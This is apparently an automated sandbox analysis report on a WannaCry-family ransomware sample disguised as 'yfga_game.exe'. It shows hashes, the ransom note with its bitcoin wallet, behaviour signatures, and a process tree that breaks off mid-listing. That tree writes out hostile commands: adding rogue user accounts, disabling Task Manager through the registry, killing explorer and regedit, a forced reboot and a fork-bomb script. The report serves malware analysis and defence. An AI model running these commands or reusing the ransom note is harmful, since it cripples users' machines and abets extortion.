Analysis

  • max time kernel
    76s
  • max time network
    56s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    15-07-2024 11:07

General

  • Target

    yfga_game.exe

  • Size

    46.5MB

  • MD5

    d45d496bd026d4f710001213527fec6c

  • SHA1

    26b050228a42f2514a89461ce1d865c12840b379

  • SHA256

    429e9011acfb31b7adc98ab43bf988585a281a04495287345bf0f730bdfe9614

  • SHA512

    73098ce3b4e9be578bf93e7a126803a7940b80e977b4ea6c725d387cc2adc19f9d8a769b68a283e99fe21c666cba849987c873663d10510ff00902c739ca4630

  • SSDEEP

    786432:N7Ud58tChs1g2uzRU7KPB8NUc3sXEPeEwkHYvgctIKpJZXnfsrQl92Z3tHDUOsj1:Nt96W76B0HkGUvgcaKpDPBl92HHDdsGy

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables Task Manager via registry modification
  • ASPack v2.12-2.42 2 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Drops startup file 2 IoCs
  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 37 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Delays execution with timeout.exe 4 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 60 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\yfga_game.exe
    "C:\Users\Admin\AppData\Local\Temp\yfga_game.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2560
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\YFGA.bat" "
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Windows\SysWOW64\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\IMPORTANT.txt
        3⤵
        • Suspicious use of FindShellTrayWindow
        PID:2860
      • C:\Windows\SysWOW64\xcopy.exe
        xcopy important.txt C:\Users\Admin\Desktop\text2.txt
        3⤵
        • Enumerates system info in registry
        PID:2864
      • C:\Windows\SysWOW64\net.exe
        net user "GO BACK!" "???" /add
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:796
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user "GO BACK!" "???" /add
          4⤵
            PID:1184
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskManager" /t REG_DWORD /d 1
          3⤵
            PID:2044
          • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\screenscrew.exe
            screenscrew.exe
            3⤵
            • Executes dropped EXE
            PID:628
          • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\flasher.exe
            flasher.exe
            3⤵
            • Executes dropped EXE
            PID:1820
          • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\calc.exe
            calc.exe
            3⤵
            • Executes dropped EXE
            PID:1700
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /K hydra.cmd
            3⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1932
            • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\jokewarehydra.exe
              jokewarehydra.exe
              4⤵
              • Executes dropped EXE
              • Suspicious use of FindShellTrayWindow
              PID:1916
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy3.vbs"
              4⤵
                PID:1528
            • C:\Windows\SysWOW64\xcopy.exe
              xcopy china.png C:\Users\Admin\Desktop\somefiles.rg.png
              3⤵
              • Enumerates system info in registry
              PID:848
            • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\walliant.exe
              walliant.exe
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2200
              • C:\Users\Admin\AppData\Local\Temp\is-IR167.tmp\walliant.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-IR167.tmp\walliant.tmp" /SL5="$301D0,4511977,830464,C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\walliant.exe"
                4⤵
                • Executes dropped EXE
                PID:1852
            • C:\Windows\SysWOW64\net.exe
              net user "FUCK OFF YFGA" "I DONT KNOW" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1848
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 user "FUCK OFF YFGA" "I DONT KNOW" /add
                4⤵
                  PID:1856
              • C:\Windows\SysWOW64\reg.exe
                reg import reg.reg
                3⤵
                • Sets desktop wallpaper using registry
                PID:1540
              • C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\YouAreAnIdiot.exe
                youareanidiot.exe
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:404
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 876
                  4⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:1520
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im fontdrvhost.exe
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2268
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im TextInputhost.exe
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2460
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im explorer.exe
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:268
              • C:\Windows\SysWOW64\timeout.exe
                timeout 5
                3⤵
                • Delays execution with timeout.exe
                PID:1652
              • C:\Windows\SysWOW64\shutdown.exe
                shutdown /r /t 30000 /c "HAHA I HACKED YOU AYFGA ROCKS YOU"
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2204
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K spam.bat "forkbomb" /min
                3⤵
                  PID:2056
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                    4⤵
                      PID:888
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im taskmgr.exe
                      4⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1576
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im regedit.exe
                      4⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1552
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                      4⤵
                        PID:2412
                      • C:\Windows\SysWOW64\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                        4⤵
                          PID:2752
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im taskmgr.exe
                          4⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2444
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im regedit.exe
                          4⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2696
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                          4⤵
                            PID:2556
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                            4⤵
                              PID:2252
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im taskmgr.exe
                              4⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2864
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im regedit.exe
                              4⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2124
                            • C:\Windows\SysWOW64\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                              4⤵
                                PID:2364
                              • C:\Windows\SysWOW64\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                4⤵
                                  PID:1452
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /f /im taskmgr.exe
                                  4⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1556
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /f /im regedit.exe
                                  4⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2488
                                • C:\Windows\SysWOW64\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                  4⤵
                                    PID:1124
                                  • C:\Windows\SysWOW64\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                    4⤵
                                      PID:1720
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /f /im taskmgr.exe
                                      4⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:844
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /f /im regedit.exe
                                      4⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1384
                                    • C:\Windows\SysWOW64\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                      4⤵
                                        PID:1828
                                      • C:\Windows\SysWOW64\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                        4⤵
                                          PID:944
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im taskmgr.exe
                                          4⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2336
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im regedit.exe
                                          4⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1592
                                        • C:\Windows\SysWOW64\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                          4⤵
                                            PID:2828
                                          • C:\Windows\SysWOW64\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                            4⤵
                                              PID:2960
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im taskmgr.exe
                                              4⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2976
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im regedit.exe
                                              4⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2300
                                            • C:\Windows\SysWOW64\WScript.exe
                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                              4⤵
                                                PID:3000
                                              • C:\Windows\SysWOW64\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                4⤵
                                                  PID:2716
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im taskmgr.exe
                                                  4⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3012
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im regedit.exe
                                                  4⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1184
                                                • C:\Windows\SysWOW64\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                  4⤵
                                                    PID:1924
                                                  • C:\Windows\SysWOW64\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                    4⤵
                                                      PID:2424
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im taskmgr.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:828
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im regedit.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:840
                                                    • C:\Windows\SysWOW64\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                      4⤵
                                                        PID:2572
                                                      • C:\Windows\SysWOW64\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                        4⤵
                                                          PID:2900
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /f /im taskmgr.exe
                                                          4⤵
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1800
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /f /im regedit.exe
                                                          4⤵
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2636
                                                        • C:\Windows\SysWOW64\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                          4⤵
                                                            PID:1164
                                                          • C:\Windows\SysWOW64\WScript.exe
                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                            4⤵
                                                              PID:2432
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /f /im taskmgr.exe
                                                              4⤵
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1632
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /f /im regedit.exe
                                                              4⤵
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:464
                                                            • C:\Windows\SysWOW64\WScript.exe
                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                              4⤵
                                                                PID:2972
                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                4⤵
                                                                  PID:2796
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im taskmgr.exe
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2756
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im regedit.exe
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2660
                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                  4⤵
                                                                    PID:1236
                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                    4⤵
                                                                      PID:744
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /f /im taskmgr.exe
                                                                      4⤵
                                                                      • Kills process with taskkill
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1336
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /f /im regedit.exe
                                                                      4⤵
                                                                      • Kills process with taskkill
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2216
                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                      4⤵
                                                                        PID:800
                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                        4⤵
                                                                          PID:1148
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill /f /im taskmgr.exe
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2168
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill /f /im regedit.exe
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1616
                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                          4⤵
                                                                            PID:2436
                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                            4⤵
                                                                              PID:1112
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im taskmgr.exe
                                                                              4⤵
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1588
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im regedit.exe
                                                                              4⤵
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2820
                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                              4⤵
                                                                                PID:2656
                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                                4⤵
                                                                                  PID:2368
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /f /im taskmgr.exe
                                                                                  4⤵
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1392
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /f /im regedit.exe
                                                                                  4⤵
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2476
                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                                  4⤵
                                                                                    PID:300
                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                                    4⤵
                                                                                      PID:1736
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /f /im taskmgr.exe
                                                                                      4⤵
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1388
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /f /im regedit.exe
                                                                                      4⤵
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:900
                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                                      4⤵
                                                                                        PID:1636
                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                                        4⤵
                                                                                          PID:2992
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /f /im taskmgr.exe
                                                                                          4⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2220
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /f /im regedit.exe
                                                                                          4⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2060
                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                                          4⤵
                                                                                            PID:1724
                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                                            4⤵
                                                                                              PID:1448
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /f /im taskmgr.exe
                                                                                              4⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:840
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /f /im regedit.exe
                                                                                              4⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:1192
                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                                              4⤵
                                                                                                PID:1352
                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                                                4⤵
                                                                                                  PID:304
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /f /im taskmgr.exe
                                                                                                  4⤵
                                                                                                  • Kills process with taskkill
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2444
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /f /im regedit.exe
                                                                                                  4⤵
                                                                                                  • Kills process with taskkill
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1392
                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                                                  4⤵
                                                                                                    PID:1616
                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                                                    4⤵
                                                                                                      PID:2704
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /f /im taskmgr.exe
                                                                                                      4⤵
                                                                                                      • Kills process with taskkill
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1976
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /f /im regedit.exe
                                                                                                      4⤵
                                                                                                      • Kills process with taskkill
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:880
                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                                                      4⤵
                                                                                                        PID:1548
                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy.vbs"
                                                                                                        4⤵
                                                                                                          PID:2016
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          taskkill /f /im taskmgr.exe
                                                                                                          4⤵
                                                                                                          • Kills process with taskkill
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2772
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          taskkill /f /im regedit.exe
                                                                                                          4⤵
                                                                                                          • Kills process with taskkill
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:824
                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_1eb29c49-7bfe-4185-9f94-85c4ac6b9bcd\annoy2.vbs"
                                                                                                          4⤵
                                                                                                            PID:2360
                                                                                                          • C:\Windows\SysWOW64\WScript.exe
